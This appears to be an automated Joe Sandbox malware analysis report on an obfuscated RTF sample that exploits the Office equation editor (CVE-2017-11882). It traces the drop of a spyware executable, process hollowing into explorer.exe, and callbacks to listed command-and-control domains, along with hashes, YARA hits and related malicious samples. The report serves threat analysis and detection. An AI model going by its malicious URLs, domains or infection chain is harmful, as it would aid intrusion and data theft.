          Security Software Discovery
          SMB/Windows Admin Shares1
          Clipboard Data
          Automated Exfiltration3
          Non-Application Layer Protocol
          Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)3
          Software Packing
          NTDS2
          Process Discovery
          Distributed Component Object ModelInput CaptureScheduled Transfer13
          Application Layer Protocol
          SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
          DLL Side-Loading
          LSA Secrets31
          Virtualization/Sandbox Evasion
          SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common1
          Rootkit
          Cached Domain Credentials1
          Remote System Discovery
          VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items1
          Masquerading
          DCSync1
          System Network Configuration Discovery
          Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job31
          Virtualization/Sandbox Evasion
          Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)812
          Process Injection
          /etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
          Behavior Graph ID: 680528
          Sample: SecuriteInfo.com.Exploit.Rt...
          Startdate: 08/08/2022
          Architecture: WINDOWS
          Score: 100

          Behavior graph (process chain and per-node signatures, as shown in the graph figure):

          • Start: Snort IDS alert for network traffic; Document contains OLE streams which likely are hidden ActiveX objects; Malicious sample detected (through community Yara rule); 14 other signatures. Started: EQNEDT32.EXE (47), WINWORD.EXE (292, 21)
          • EQNEDT32.EXE: Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802). Started: cmd.exe
          • WINWORD.EXE: dropped C:\Users\user\AppData\Local\Temp\Client.exe (PE32); C:\Users\user\...\Client.exe:Zone.Identifier (ASCII); ~WRF{4F98E955-E40B...E-253D7E3CD6E7}.tmp (Composite). Document exploit detected (creates forbidden files)
          • cmd.exe: Started: Client.exe
          • Client.exe: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Writes to foreign memory regions; 3 other signatures. Started: notepad.exe
          • notepad.exe: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; 2 other signatures. Injected: explorer.exe
          • explorer.exe: DNS/IP: www.best-boy.net 104.167.67.175, 49172, 80 ESITEDUS United States; thegoldencamel.online 66.235.200.170, 49171, 80 CLOUDFLARENETUS United States; www.thegoldencamel.online. System process connects to network (likely due to code injection or exploit); Uses ipconfig to lookup or modify the Windows network settings. Started: ipconfig.exe
          • ipconfig.exe: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements. Started: cmd.exe

          Source | Detection | Scanner | Label
          SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.rtf | 43% | Virustotal |
          SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.rtf | 22% | ReversingLabs | Document-RTF.Trojan.Heuristic
          Source | Detection | Scanner | Label
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{4F98E955-E40B-4BEE-AA1E-253D7E3CD6E7}.tmp | 100% | Avira | EXP/CVE-2017-11882.Gen
          C:\Users\user\AppData\Local\Temp\Client.exe | 100% | Joe Sandbox ML |
          C:\Users\user\AppData\Local\Temp\Client.exe | 24% | ReversingLabs | ByteCode-MSIL.Spyware.Noon
          Source | Detection | Scanner | Label
          9.0.notepad.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          9.2.notepad.exe.400000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          9.0.notepad.exe.400000.3.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          9.0.notepad.exe.400000.4.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          9.0.notepad.exe.400000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          9.0.notepad.exe.400000.5.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          9.0.notepad.exe.400000.2.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          No Antivirus matches
          Source | Detection | Scanner | Label
          www.lundadonate.xyz/nb30/ | 1% | Virustotal |
          www.lundadonate.xyz/nb30/ | 100% | Avira URL Cloud | malware
          http://wellformedweb.org/CommentAPI/ | 0% | URL Reputation | safe
          http://www.iis.fhg.de/audioPA | 0% | URL Reputation | safe
          http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe
          http://treyresearch.net | 0% | URL Reputation | safe
          http://java.sun.com | 0% | URL Reputation | safe
          http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe
          http://www.best-boy.net/nb30/?4hntpZ=WWLsvV61WazOGjhWPmK2zCox7nD1HU3ZrNfLe9lvYYokad8918qHb5Jmu9JsRIh/3onKEQ==&PPa=ApcXW2 | 0% | Avira URL Cloud | safe
          http://computername/printers/printername/.printer | 0% | Avira URL Cloud | safe
          http://www.%s.comPA | 0% | URL Reputation | safe
          http://servername/isapibackend.dll | 0% | Avira URL Cloud | safe
          http://www.thegoldencamel.online/nb30/?4hntpZ=HrFg7Zw77Q4AgN6xWDdwD99B0qzSSsTIjhXIVaLmDYdCsLEuJk5C8qRmA5PaAiVsBqYing==&PPa=ApcXW2 | 0% | Avira URL Cloud | safe
          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          thegoldencamel.online | 66.235.200.170 | true | true | | unknown
          www.best-boy.net | 104.167.67.175 | true | true | | unknown
          www.thegoldencamel.online | unknown | unknown | true | | unknown
          Name | Malicious | Antivirus Detection | Reputation
          www.lundadonate.xyz/nb30/ | true | 1%, Virustotal; Avira URL Cloud: malware | low
          http://www.best-boy.net/nb30/?4hntpZ=WWLsvV61WazOGjhWPmK2zCox7nD1HU3ZrNfLe9lvYYokad8918qHb5Jmu9JsRIh/3onKEQ==&PPa=ApcXW2 | true | Avira URL Cloud: safe | unknown
          http://www.thegoldencamel.online/nb30/?4hntpZ=HrFg7Zw77Q4AgN6xWDdwD99B0qzSSsTIjhXIVaLmDYdCsLEuJk5C8qRmA5PaAiVsBqYing==&PPa=ApcXW2 | true | Avira URL Cloud: safe | unknown
Name / Source / Malicious / Antivirus Detection / Reputation
Name: http://www.windows.com/pctv.; Source: explorer.exe, 0000000A.00000000.1030986946.0000000003B10000.00000002.00000001.00040000.00000000.sdmp; Malicious: false; Reputation: high
Name: http://investor.msn.com; Source: explorer.exe, 0000000A.00000000.1030986946.0000000003B10000.00000002.00000001.00040000.00000000.sdmp; Malicious: false; Reputation: high
Name: http://www.msnbc.com/news/ticker.txt; Source: explorer.exe, 0000000A.00000000.1030986946.0000000003B10000.00000002.00000001.00040000.00000000.sdmp; Malicious: false; Reputation: high
Name: http://wellformedweb.org/CommentAPI/; Source: explorer.exe, 0000000A.00000000.970687640.00000000046D0000.00000002.00000001.00040000.00000000.sdmp; Malicious: false; Antivirus Detection: URL Reputation: safe; Reputation: unknown
Name: http://www.piriform.com/ccleanerp; Source: explorer.exe, 0000000A.00000000.969152262.0000000004385000.00000004.00000001.00020000.00000000.sdmp; Malicious: false; Reputation: high
Name: http://www.iis.fhg.de/audioPA; Source: explorer.exe, 0000000A.00000000.970687640.00000000046D0000.00000002.00000001.00040000.00000000.sdmp; Malicious: false; Antivirus Detection: URL Reputation: safe; Reputation: unknown
Name: http://www.piriform.com/ccleanerq; Source: explorer.exe, 0000000A.00000000.1004860034.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.988141924.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.962364346.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1030297831.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp; Malicious: false; Reputation: high
Name: http://www.piriform.com/ccleaner1SPS0; Source: explorer.exe, 0000000A.00000000.980217883.0000000008617000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1012221961.0000000008617000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.996182777.0000000008617000.00000004.00000001.00020000.00000000.sdmp; Malicious: false; Reputation: high
Name: http://windowsmedia.com/redir/services.asp?WMPFriendly=true; Source: explorer.exe, 0000000A.00000000.1005858941.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp; Malicious: false; Antivirus Detection: URL Reputation: safe; Reputation: unknown
Name: http://www.hotmail.com/oe; Source: explorer.exe, 0000000A.00000000.1030986946.0000000003B10000.00000002.00000001.00040000.00000000.sdmp; Malicious: false; Reputation: high
Name: http://treyresearch.net; Source: explorer.exe, 0000000A.00000000.970687640.00000000046D0000.00000002.00000001.00040000.00000000.sdmp; Malicious: false; Antivirus Detection: URL Reputation: safe; Reputation: unknown
Name: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check; Source: explorer.exe, 0000000A.00000000.1005858941.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp; Malicious: false; Reputation: high
Name: http://java.sun.com; Source: explorer.exe, 0000000A.00000000.1027469570.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.984634900.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.999499813.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.954363521.0000000000335000.00000004.00000020.00020000.00000000.sdmp; Malicious: false; Antivirus Detection: URL Reputation: safe; Reputation: unknown
Name: http://www.icra.org/vocabulary/.; Source: explorer.exe, 0000000A.00000000.1005858941.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp; Malicious: false; Antivirus Detection: URL Reputation: safe; Reputation: unknown
Name: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.; Source: explorer.exe, 0000000A.00000000.957907821.0000000001DD0000.00000002.00000001.00040000.00000000.sdmp; Malicious: false; Reputation: high
Name: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv; Source: explorer.exe, 0000000A.00000000.996446358.0000000008675000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1011537608.00000000084D2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.995286555.00000000084D2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.996486805.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.980535513.0000000008675000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.980217883.0000000008617000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1012512071.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1012445260.0000000008675000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.979280066.00000000084D2000.00000004.00000001.00020000.00000000.sdmp; Malicious: false; Reputation: high
Name: http://investor.msn.com/; Source: explorer.exe, 0000000A.00000000.1030986946.0000000003B10000.00000002.00000001.00040000.00000000.sdmp; Malicious: false; Reputation: high
Name: http://www.piriform.com/ccleaner; Source: explorer.exe, 0000000A.00000000.979092097.00000000084C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.962364346.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1030297831.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1012512071.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1012445260.0000000008675000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1012221961.0000000008617000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.979280066.00000000084D2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.996182777.0000000008617000.00000004.00000001.00020000.00000000.sdmp; Malicious: false; Reputation: high
Name: http://computername/printers/printername/.printer; Source: explorer.exe, 0000000A.00000000.970687640.00000000046D0000.00000002.00000001.00040000.00000000.sdmp; Malicious: false; Antivirus Detection: Avira URL Cloud: safe; Reputation: low
Name: http://www.%s.comPA; Source: explorer.exe, 0000000A.00000000.957907821.0000000001DD0000.00000002.00000001.00040000.00000000.sdmp; Malicious: false; Antivirus Detection: URL Reputation: safe; Reputation: low
Name: http://www.autoitscript.com/autoit3; Source: explorer.exe, 0000000A.00000000.1027469570.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.984634900.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.999499813.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.954363521.0000000000335000.00000004.00000020.00020000.00000000.sdmp; Malicious: false; Reputation: high
Name: https://support.mozilla.org; Source: explorer.exe, 0000000A.00000000.1027469570.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.984634900.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.999499813.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.954363521.0000000000335000.00000004.00000020.00020000.00000000.sdmp; Malicious: false; Reputation: high
Name: http://www.piriform.com/ccleanerv; Source: explorer.exe, 0000000A.00000000.969152262.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1007082449.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.991189675.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1032583619.0000000004385000.00000004.00000001.00020000.00000000.sdmp; Malicious: false; Reputation: high
Name: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name; Source: Client.exe, 00000006.00000002.951081960.0000000002641000.00000004.00000800.00020000.00000000.sdmp; Malicious: false; Reputation: high
Name: http://servername/isapibackend.dll; Source: explorer.exe, 0000000A.00000000.973857047.0000000006450000.00000002.00000001.00040000.00000000.sdmp; Malicious: false; Antivirus Detection: Avira URL Cloud: safe; Reputation: low
                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs
IP / Domain / Country / ASN / ASN Name / Malicious
IP: 104.167.67.175; Domain: www.best-boy.net; Country: United States; ASN: 22552; ASN Name: ESITEDUS; Malicious: true
IP: 66.235.200.170; Domain: thegoldencamel.online; Country: United States; ASN: 13335; ASN Name: CLOUDFLARENETUS; Malicious: true
                                                Joe Sandbox Version:35.0.0 Citrine
                                                Analysis ID:680528
Start date and time:2022-08-08 18:37:10 +02:00
                                                Joe Sandbox Product:CloudBasic
                                                Overall analysis duration:0h 9m 33s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Sample file name:SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.19912 (renamed file extension from 19912 to rtf)
                                                Cookbook file name:defaultwindowsofficecookbook.jbs
                                                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed:14
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:1
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • HDC enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Detection:MAL
                                                Classification:mal100.troj.expl.evad.winRTF@11/9@2/2
                                                EGA Information:
                                                • Successful, ratio: 100%
                                                HDC Information:
                                                • Successful, ratio: 15% (good quality ratio 13.8%)
                                                • Quality average: 66.8%
                                                • Quality standard deviation: 30.4%
                                                HCA Information:
                                                • Successful, ratio: 76%
                                                • Number of executed functions: 86
                                                • Number of non-executed functions: 22
                                                Cookbook Comments:
                                                • Adjust boot time
                                                • Enable AMSI
                                                • Found Word or Excel or PowerPoint or XPS Viewer
                                                • Attach to Office via COM
                                                • Scroll down
                                                • Close Viewer
                                                • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, conhost.exe, svchost.exe
• Not all processes were analyzed, report is missing behavior information
                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                • Report size getting too big, too many NtSetInformationFile calls found.
Time / Type / Description
Time: 18:38:17; Type: API Interceptor; Description: 28x Sleep call for process: EQNEDT32.EXE modified
Time: 18:38:18; Type: API Interceptor; Description: 179x Sleep call for process: Client.exe modified
Time: 18:38:41; Type: API Interceptor; Description: 5x Sleep call for process: notepad.exe modified
Time: 18:39:25; Type: API Interceptor; Description: 201x Sleep call for process: ipconfig.exe modified
Time: 18:39:56; Type: API Interceptor; Description: 1x Sleep call for process: explorer.exe modified
                                                No context
                                                No context
Match / Associated Sample Name / URL / Detection / Context
Match: CLOUDFLARENETUS
Sample Name / URL: https://u27327601.ct.sendgrid.net/ls/click?upn=fULIR8E9Fo6u8OA-2BYAXhc-2FQx1k1Uxf5mM3hKT1odxpi2fW8EBt9glJ9IlhAMtRmyu3L6y6BfP-2FvFe4WzL41-2F0ihBbNI0psOf9g5VAgP4xI-2BON0wZdo6Krvt87xgHH2wq7q76CjP4rwdTyjMymsvVQZCxTr-2BrMfMw6qKvghyIET4-3DgSx9_I7Qk3A2uQ8LXZnFWLHn8NGmOj0e12gLCrQBMxtq5mwqpFA5dVXp-2FLcxQ5jJWd1hqVirQrjX3-2BggEEBN-2F9-2Fq2RjKY3qLsVI0LzgBzNNSnqmzZmKETE9vO3g0Lj-2F7Bo76ctBoOfi0VrajAjVOhntr-2FB-2FnmqXdBpGoecANNPnI1XSxrBt7Q6tizRgFnTGciedfqX7q9qf6iwnx-2B2b2AQwki4B0xGxz8ey6JheNKDLofRVU-3D; Detection: malicious; Context: 104.17.25.14
Sample Name / URL: https://u27327601.ct.sendgrid.net/ls/click?upn=fULIR8E9Fo6u8OA-2BYAXhc-2FQx1k1Uxf5mM3hKT1odxpi2fW8EBt9glJ9IlhAMtRmyu3L6y6BfP-2FvFe4WzL41-2F0ihBbNI0psOf9g5VAgP4xI-2FNNksxCYlCfwKrRsBm3JOU7I14nxFnSIreiFHkQp0bvtrLsL8lLOEXDbk4owTsoKg-3DQPK8_GPSrddeDfhddW9pFoFhVDbWOQu7iyaT84Z3rGxxzDX5zOUziT4pGmdfe-2Fbl79QRgM6qGm9Wezxoa-2F8BOhz6c1Uz19NgxtmSoRv6IN4hUYbd8JAbUAn6Y4fQ61GK7skPRiNoRQBKwvmB7vfpH0rTi7qi0qS1KbkGRVoAj4SoncvCUjpsEtuan4xKXPAP0PvrjaAATpp8tEfuXHSQDO3DJwjUsR5GCgTPGIKzC3IgEwz4-3D; Detection: malicious; Context: 104.17.64.14
Sample Name / URL: https://u27327601.ct.sendgrid.net/ls/click?upn=fULIR8E9Fo6u8OA-2BYAXhc-2Ft-2BI-2BWdnapLwZaldGDfS7Hzp6-2BmLLXtY-2BKqdtluF3jEAa5yE5n-2FItM4tNQxCj05OhOADjByD9574J3m5d1GmPXSY7h82Aa2Akecy-2FdU1i4bqkz5IrM4nTV9tdx0tOLiFZuRvTG5FJGGZ1JkzvS-2FVEQ-3DsK_o_MDI6agRqhN5svOHRSDA7eZuKi4uFyPzTFD1vjcTk1IBg4i5bsEwnQokJNpSrAXVd-2BLJ0Tu5il1njeX-2BBg-2BTy35kp6sLlAo6uJKs05vFRp0l-2Fa7u2iEh5RdyWMH2MfSV3IL0Op4TPsHTYwsgJRgms5gC1ywl-2F62PAwUEmIe2Q0awgyUDBgTDdBoIfFprcaIJFffcOF1rQ-2BTK6f2pYeT8iDHz-2FBoH-2FN17ySL7ucYd0D4o-3D; Detection: malicious; Context: 104.18.11.207
Sample Name / URL: DOCUMENTO DE CONFIRMACION PSE.exe; Detection: malicious; Context: 162.159.134.233
Sample Name / URL: Unclear Proforma Invoice.vbs; Detection: malicious; Context: 104.21.39.116
Sample Name / URL: https://linkprotect.cudasvc.com/url?a=https%3a%2f%2fu27327601.ct.sendgrid.net%2fls%2fclick%3fupn%3dfULIR8E9Fo6u8OA-2BYAXhc-2Ft-2BI-2BWdnapLwZaldGDfS7Hzp6-2BmLLXtY-2BKqdtluF3jEAa5yE5n-2FItM4tNQxCj05OhOADjByD9574J3m5d1GmPXSY7h82Aa2Akecy-2FdU1i4bbO12YuEY8ipo-2BRVeNDawl-2BwPDqskRhuHhOHG9c-2Fm7Gw-3DzFOe_vN750sXTiuVUpTx8JW5BwW0XbEMxWWlxA4ijxHmxf2b5I2UcuHOBN-2FV9KAoJzsJcEhTNV6ONW5GJcyujJV5KrmdsuJHHE6ucknYLD9S-2FFKjtdLWUSwvR-2BseXhYEF-2Bc74Wf4v1OC2TSbvAOKlYznighIhywBixOnslQeh4-2FDHHdw5u17J4on7oNl9jBIN40ALf4MxVNmsLgGDQBBRR-2F0nNg-2BxnlEKLBErYcmoCpIco0M-3D&c=E,1,L11H5-8bfxXAkL9fWLoe4mjKFfvO2utl2BzB8mgZ4JcbTEoYwuiSyFkeu8Bl4kCo43_RYlJ9IDinVwRRx_kL9d1tz2RYUzIkog0fJ4i_WBnJgVEqI29M&typo=1; Detection: malicious; Context: 104.18.11.207
Sample Name / URL: http://info.dnfcorp.com/unsubscribe/u/81/58adb727bfae91e4e5663f2a60e63649d32bc35a666c219d6a926e0ab5bfef85/1088736175; Detection: malicious; Context: 104.18.11.207
Sample Name / URL: https://u27327601.ct.sendgrid.net/ls/click?upn=fULIR8E9Fo6u8OA-2BYAXhc-2FQx1k1Uxf5mM3hKT1odxpi2fW8EBt9glJ9IlhAMtRmyu3L6y6BfP-2FvFe4WzL41-2F0ihBbNI0psOf9g5VAgP4xI-2BCFh6HEHI4o81Fh-2FVY8oBuVvbqhUVl98-2Fx8Ghn8qfT8WcwUpVuz4UgF5ymH-2BBXJU0-3DUCCo_YMJdYxCsbA3IVx986czIdfoAlJFC3wbeDJ3VEpZJ-2BRI9aloPf6W6lFzLERI9AfXKRTERIdI8AvT-2FOTPhMMJrfvrNUD7C6mKmFLSyHZ08ShAzsrzpp-2F-2BUG1v0abbl5IUi5dzO-2BcoBFm6J28mSDs7Jz-2FnWtkCDCj-2F6QjyUDnjdlyGEEMfoqgrWDjDvwDGG6ERHR18v8yTdiaaXkUCRm5jPTuwI2Ov7k3xb8lkYobqCfTc-3D; Detection: malicious; Context: 104.17.25.14
Sample Name / URL: http://info.dnfcorp.com/e/81/stonefly-private-cloud-storage/58rdcn/1088736175?h=jRwiY1bIrVps8EcmKqQ_hSGPvJ00ulzmrHVEaQrxL88; Detection: malicious; Context: 172.67.38.66
Sample Name / URL: ICPO07082299976.doc; Detection: malicious; Context: 162.159.134.233
Sample Name / URL: http://okaloosaclerk.loyaltyhn.com/#.aHR0cDovL2Z1ZWd1aWxsb3MuY2wvd3AtaW5jbHVkZXMvaW1hZ2VzL3NtaWxpZXMvenovP2U9dHdpbGNveEBva2Fsb29zYWNsZXJrLmNvbQ==; Detection: malicious; Context: 104.18.10.207
Sample Name / URL: QBORemittance_Danellarealty#007-Intuit.html; Detection: malicious; Context: 104.17.24.14
Sample Name / URL: swift.exe; Detection: malicious; Context: 104.20.68.143
Sample Name / URL: Paystub_ACH_from_Seminolecountyfl_Association_Management_Inc._732456_0138.pdf.Html; Detection: malicious; Context: 104.17.25.14
Sample Name / URL: https://download-folder-files.secure-place.workers.dev/; Detection: malicious; Context: 104.17.25.14
Sample Name / URL: SARS DEMAND LETTER_Pdf.html; Detection: malicious; Context: 104.18.36.4
Sample Name / URL: https://www.paperturn-view.com/?pid=MjY263733; Detection: malicious; Context: 104.18.204.90
Sample Name / URL: SecuriteInfo.com.Exploit.CVE-2017-0199.02.Gen.27968.xlsx; Detection: malicious; Context: 188.114.96.3
Sample Name / URL: https://storageapi-fleek-co.translate.goog/a75bdd74-7db1-4f63-b832-e58250bda1b8-bucket/calamerywee/veweweesswe/none3.html?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en-US&_x_tr_pto=wapp#IAmBadAtPhishing@GETAJOB.com; Detection: malicious; Context: 104.17.25.14
Sample Name / URL: https://dracoon.team/public/download-shares/y6NoiZr86Bd4qT3d2qF2howatSjGRn8W; Detection: malicious; Context: 104.18.36.4
Match: ESITEDUS
Sample Name / URL: t6bwEs3d5W.exe; Detection: malicious; Context: 104.167.67.167
Sample Name / URL: 0vhbazZ0hg.dll; Detection: malicious; Context: 104.201.54.25
Sample Name / URL: 2yQ8hmXyz0.dll; Detection: malicious; Context: 104.224.242.132
Sample Name / URL: fQew7F3WdJ.dll; Detection: malicious; Context: 104.222.239.165
Sample Name / URL: cutie.i686; Detection: malicious; Context: 172.80.124.140
Sample Name / URL: OE6aq7Pen7.exe; Detection: malicious; Context: 172.81.61.204
Sample Name / URL: 8yE2Cb5pMj.exe; Detection: malicious; Context: 172.81.62.200
Sample Name / URL: ADNOC RFQ 97571784.exe; Detection: malicious; Context: 104.221.130.199
Sample Name / URL: jew.arm7; Detection: malicious; Context: 104.201.37.126
Sample Name / URL: payment advice_0009890.exe; Detection: malicious; Context: 172.80.98.79
Sample Name / URL: arm7; Detection: malicious; Context: 69.87.201.72
Sample Name / URL: New Order 56723SCF..exe; Detection: malicious; Context: 104.201.51.51
Sample Name / URL: miori.arm7-20220630-2250; Detection: malicious; Context: 104.232.145.187
Sample Name / URL: nHgrTEc1Q0tZEa7.exe; Detection: malicious; Context: 172.80.98.79
Sample Name / URL: ADNOC RFQ 97571784_pdf.exe; Detection: malicious; Context: 172.80.98.79
Sample Name / URL: DHL_Shipping Documents_pdf_98567.exe; Detection: malicious; Context: 172.80.98.79
Sample Name / URL: sora.arm7; Detection: malicious; Context: 69.87.201.51
Sample Name / URL: DHL_Shipping Documents_pdf.exe; Detection: malicious; Context: 172.80.98.79
Sample Name / URL: payment advice_pdf_049584.exe; Detection: malicious; Context: 104.221.130.199
Sample Name / URL: HPYYRvmbqF; Detection: malicious; Context: 172.82.127.215
                                                No context
                                                No context
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                Category:dropped
                                                Size (bytes):968192
                                                Entropy (8bit):7.221905189702602
                                                Encrypted:false
                                                SSDEEP:12288:924dTkV9VXtdGI1HNDT5wQjG6EXPGc/16/PxuepSxmwCD8ik:Ts9RauHN/5wa8/L9UueAxmfHk
                                                MD5:BE1CF0179CC129FE5BA102A5EFFA515E
                                                SHA1:4A0468FAB21F7C2054F728530E9502C294B92356
                                                SHA-256:64249AF03BFA82B6DA362EAF94864CF4698BECD35869586F43101E62D1B706AF
                                                SHA-512:FF189C9764C3AF8AA4F33F268F0B50FBFA6E4A938F1F8059BFDF60D1409029CBDEBC1D926E4AEF1BA5F616B87BB5D62FD07A175481BD9F87BB6BF58E27394FA8
                                                Malicious:true
                                                Yara Hits:
                                                • Rule: rtf_cve2017_11882_ole, Description: Attempts to identify the exploit CVE 2017 11882, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{4F98E955-E40B-4BEE-AA1E-253D7E3CD6E7}.tmp, Author: John Davison
                                                • Rule: EXP_potential_CVE_2017_11882, Description: unknown, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{4F98E955-E40B-4BEE-AA1E-253D7E3CD6E7}.tmp, Author: ReversingLabs
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                Reputation:low
                                                Preview:......................>...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................]...\........................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):1024
                                                Entropy (8bit):0.05390218305374581
                                                Encrypted:false
                                                SSDEEP:3:ol3lYdn:4Wn
                                                MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                Malicious:false
                                                Reputation:high, very likely benign file
                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
